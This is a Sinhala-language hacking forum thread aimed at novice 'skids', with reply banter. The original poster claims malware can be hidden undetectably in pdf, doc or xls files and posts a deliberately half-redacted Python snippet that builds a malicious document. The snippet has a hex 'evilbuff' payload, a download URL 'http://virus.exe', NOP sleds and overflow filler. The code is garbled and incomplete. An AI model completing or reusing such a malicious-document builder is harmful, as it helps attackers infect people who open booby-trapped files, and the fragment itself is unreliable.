සිඟිති Hacking/ Cracking ආතල් 4 SKIDS II

kaotic

Member
Aug 6, 2014
1,616
482
0
Sri Lanka
සිඟිති Hacking/ Cracking ආතල් 4 SKIDS II

සිඟිති Hacking/ Cracking ආතල් 4 SKIDS II

Skid.jpg



පලවෙනි කොටස බලාපු නැති කට්ටිය මෙන්න මෙතනින් ගිහින් බලලා එන්න..

Code:
http://elakiri.com/forum/showthread.php?t=1681441
කීපදෙනෙක් කරපු ඉල්ලීමක් නිසා දාන ත්‍රෙඩ් එකක් මේ..SKIDS කියලා දාලා තිබ්බට ලැජ්ජාවට හොරන් එබිලා බලලා යන්නේ නැතුව කමෙන්ට් එකක් දාගෙනම යන්න. :rofl:

HACKERS HANDBOOK


අද මම මුකුත් විශේෂ දෙයක් කියලා දෙන්න නෙමෙයි යන්නේ ඔයාලට කියවලා අවබෝධ කරගන්න වටිනා දෙයක් දෙන්න යන්නේ. මොකද මම මේ දවස් ටිකේ තරමක් කාර්‍යබහුල වෙලා ඉන්න නිසා එක දිගට ටයිප් කරන්න තරමක් අපහසුයි..

කොහොම උනත් අපි ඊලඟට කතා කරන දේවල් වෙනුවෙන් මෙන්න මේ පොත බාගෙන බලලා ඉන්නකෝ... මේක txt file එකක්..:)

p.s.- මම මේ දෙන ෆයිල් ඔයාලා අනිවාර්‍යයෙන්ම ස්කෑන් කරලා ගන්න..මොකද මම කැමති නෑ නිකම් වචනයක් අහන්න කාගෙන්වත් වයිරස් කතාවක් කියලා..
ඔයාලගේ වයිරස් ගාඩ් එක ෂුවර් මදි නම් මෙන්න මේ සයිට් එකෙක් ෆයිල් එක ඩවුන්ලෝඩ් කරන්න කලින් ලිංක් එක දාලා වයිරස් ගාඩ් 54කින් නොමිලේම ස්කෑන් කරගන්න..

Code:
http://www.virustotal.com
කීපදෙනෙක්ම අහලා තිබ්බා pdf ෆයිල් වලින් වයිරස් එනවද? එහෙම එවන්න පුලුවනිද කියලා..

උත්තරේ ඔව් පුලුවන්.. pdf/doc,xls ෆයිල් එකක හංගලා එවන්නත් පුලුවන් FUD. ඒ වගේම pdf ෆයිල් එක ඕපන් කලාම ඩවුන්ලෝඩ් වෙන්න එවන්නත් පුලුවන්..ඒත් බය වෙන්න එපා මම එහෙම එවලා නෑ..:rofl: ඒත් බයයි නම් ඩවුන්ලෝඩ් කරන්නම එපා..:no:

මෙන්න මේ වගේ කෝඩ් එකක් තමයි ඕකට භාවිතා වෙන්නේ..බාගයක් මකලා තියෙන්නේ, ඉල්ලන්න නම් එපා:P ලෝබකමකින් නෙමෙයි. අමාරුවේ වැටෙන්න බෑ,:):nerd:


python


Code:
import binascii
filename = "filename.pdf"


file="7B5xxxxxxxxxxxxxx16465666C616E6731xxxxxxxx5C2A5C2A5C2A5C2A5C2A5C2A5C2A5C2A5CxxxxxxxxxxxxxxxxB5C2A7D7B5C2A7D7B5C2A7D6
evilbuff = (binascii.unhexlify(file))
//
URL="http://virus.exe"
nxt='{}}}}}}' * 10000
URL2="00" * 1000000
nxt+="x00" * 10000
nxt+="\x0d\x0a" * 1000000
nxt+="\x00" * 100000
nxt+="\x0d\x0a\x7d\x0d\x0a\x00" * 1000
buff="\x90" * 1000
buff+="\x7d" * 8
binnu=binascii.b2a_hex(URL)

finful = (evilbuff+xxxxxx+nxt+xxxxx)

textfile = open(filename , 'w')
textfile.write(finful)

#f.write(finful)
#print ("[+] Greetings Vul: [email protected]")
#print ("[+] Done")


[FONT=&quot]:yes:අනවසරයෙන්[/FONT][FONT=&quot] උපුටා ගැනීම [/FONT][FONT=&quot]සපුරා [/FONT][FONT=&quot]තහනම්[/FONT].:yes:


Disclaimer - Only 4 educational purposes. use it at your own risk. No liabilities or bond which damages or such may occur by using these methods.:rofl:


[FONT=&quot]මගේ[/FONT][FONT=&quot] අනිත්[/FONT][FONT=&quot] ත්[/FONT][FONT=&quot]රෙඩ්

[/FONT]

ස්කයිප් HACKING PREVENTION



නොමිලේ Facebook, Youtube, Twitter Likes, Shares


[FONT=&quot]නොමිලේ[/FONT] [FONT=&quot]ඩොමේන්[/FONT] [FONT=&quot]එකක්[/FONT] [FONT=&quot]ඕනද[/FONT]?


[FONT=&quot]සර්ප[/FONT] [FONT=&quot]විෂ[/FONT] [FONT=&quot]වෙදකම[/FONT]


[FONT=&quot]සර්පයෙකු[/FONT] [FONT=&quot]දෂ්ටකල[/FONT] [FONT=&quot]විට[/FONT] [FONT=&quot]රෝහලට[/FONT] [FONT=&quot]යනතෙක්[/FONT] [FONT=&quot]කල[/FONT] [FONT=&quot]යුතු[/FONT] [FONT=&quot]දෑ[/FONT]


[FONT=&quot]නාග[/FONT] [FONT=&quot]මානික්[/FONT]‍[FONT=&quot]ය[/FONT]...[FONT=&quot]මෙය[/FONT] [FONT=&quot]මිත්[/FONT]‍[FONT=&quot]යාවක්ද[/FONT]? [FONT=&quot]සත්[/FONT]‍[FONT=&quot]යක්ද[/FONT]?


[FONT=&quot]සියදිවි[/FONT] [FONT=&quot]හානි[/FONT] [FONT=&quot]කරගන්නේ[/FONT] [FONT=&quot]මිනිස්සු[/FONT] [FONT=&quot]විතරද[/FONT]??


[FONT=&quot]ස්ත්[/FONT]‍[FONT=&quot]රීපුර[/FONT] [FONT=&quot]කන්දේ[/FONT] [FONT=&quot]උමග[/FONT] [FONT=&quot]තුලට[/FONT] [FONT=&quot]ගිය[/FONT] [FONT=&quot]ගමන[/FONT]


[FONT=&quot]හදිසි[/FONT][FONT=&quot] ආපදාවන්ට[/FONT][FONT=&quot] මුහුණ[/FONT][FONT=&quot] දෙමු[/FONT]! Survival Guide (Crash Course) - Part 1


[FONT=&quot]හදිසි[/FONT] [FONT=&quot]ආපදාවන්ට[/FONT] [FONT=&quot]මුහුණ[/FONT] [FONT=&quot]දෙමු[/FONT]! Survival Guide (Crash Course) - Part 2-First Aid


[FONT=&quot]සුපිරි[/FONT][FONT=&quot]සොල්දාදුවන්[/FONT] (Super Soldiers)
[FONT=&quot]මෙය[/FONT][FONT=&quot]මිත්[/FONT][FONT=&quot]යාවක්ද[/FONT]? [FONT=&quot]සත්[/FONT][FONT=&quot]යක්ද[/FONT]?


[FONT=&quot]කාල[/FONT] [FONT=&quot]තරණය[/FONT] Time Travel with Proofs


[FONT=&quot]අයුක්තියට[/FONT] [FONT=&quot]එරෙහි[/FONT] [FONT=&quot]වූ[/FONT] [FONT=&quot]මෙක්සිකන්[/FONT] [FONT=&quot]මිනීමරුවා[/FONT]


[FONT=&quot]නවීන[/FONT] [FONT=&quot]යුධ[/FONT] [FONT=&quot]අවි[/FONT] 01

[FONT=&quot]නවීන[/FONT] [FONT=&quot]යුධ[/FONT] [FONT=&quot]අවි[/FONT] 02

[FONT=&quot]නවීන[/FONT] [FONT=&quot]යුධ[/FONT] [FONT=&quot]අවි[/FONT] 03

[FONT=&quot]නවීන[/FONT] [FONT=&quot]යුධ[/FONT] [FONT=&quot]අවි[/FONT] 04
 
Last edited:

ruchira55

Well-known member
  • Mar 23, 2012
    39,862
    40,610
    113
    oya wage deyakin berena widiyath kiyala deepanko.
    pdf/doc/xls file wala hangala ewalada kiyala hoya ganne kohomada?
     

    kaotic

    Member
    Aug 6, 2014
    1,616
    482
    0
    Sri Lanka
    ela ela.tho virus ekk neme ne dunne
    +5
    අපෝ නෑ බං කාවවත් අමාරුවේ දාන්න කිසිම උවමනාවක් නෑ..දැනුම බෙදාගන්න විතරයි උවමනා උනේ..
    HOW2B ANONYMOUS කියලා ත්‍රෙඩ් එකක් දානවා අද හවස.stay tuned
     

    crazy_lakshitha

    Well-known member
  • Dec 2, 2011
    1,811
    497
    113
    එළකිරිලන්තේ.....
    අපෝ නෑ බං කාවවත් අමාරුවේ දාන්න කිසිම උවමනාවක් නෑ..දැනුම බෙදාගන්න විතරයි උවමනා උනේ..
    HOW2B ANONYMOUS කියලා ත්‍රෙඩ් එකක් දානවා අද හවස.stay tuned

    hhaha-just-kidding.jpg


    den me ube textbook eka kiyawana gaman...:lol::lol:
     

    kaotic

    Member
    Aug 6, 2014
    1,616
    482
    0
    Sri Lanka
    hhaha-just-kidding.jpg


    den me ube textbook eka kiyawana gaman...:lol::lol:
    ela ela...ඕක මං ලියපු එකක් නෙමෙයි බං.:P මට ආසයි සිරාම හැකින් කරන ක්‍රම ටිකක් දාන්න .ඒත් මට බය අපේ උන් ඒවා පාවිච්චි කරලා උණු උණුවේ එක එකාව expose කරගනී කියලා:rofl:
     

    IDG

    Well-known member
  • Aug 3, 2012
    14,166
    3,146
    113
    34
    වාහන ගොඩේ
    ඹය වගේ python වලින් කොඩ් එකක් යැව්වාට මචන් අපි යවන මැෂින් එකේ python compiler එක නැත්තම් රන් වෙන්නේ නැ නේද ?
     

    crazy_lakshitha

    Well-known member
  • Dec 2, 2011
    1,811
    497
    113
    එළකිරිලන්තේ.....
    ela ela...ඕක මං ලියපු එකක් නෙමෙයි බං.:P මට ආසයි සිරාම හැකින් කරන ක්‍රම ටිකක් දාන්න .ඒත් මට බය අපේ උන් ඒවා පාවිච්චි කරලා උණු උණුවේ එක එකාව expose කරගනී කියලා:rofl:

    ayeth ahala:P:P:P:P
     

    other guy

    Well-known member
  • Apr 18, 2014
    8,667
    770
    113
    neverland
    ela ela...ඕක මං ලියපු එකක් නෙමෙයි බං.:P මට ආසයි සිරාම හැකින් කරන ක්‍රම ටිකක් දාන්න .ඒත් මට බය අපේ උන් ඒවා පාවිච්චි කරලා උණු උණුවේ එක එකාව expose කරගනී කියලා:rofl:

    උඹවම මුලින් එක්ස්පොස් කරයි :rofl: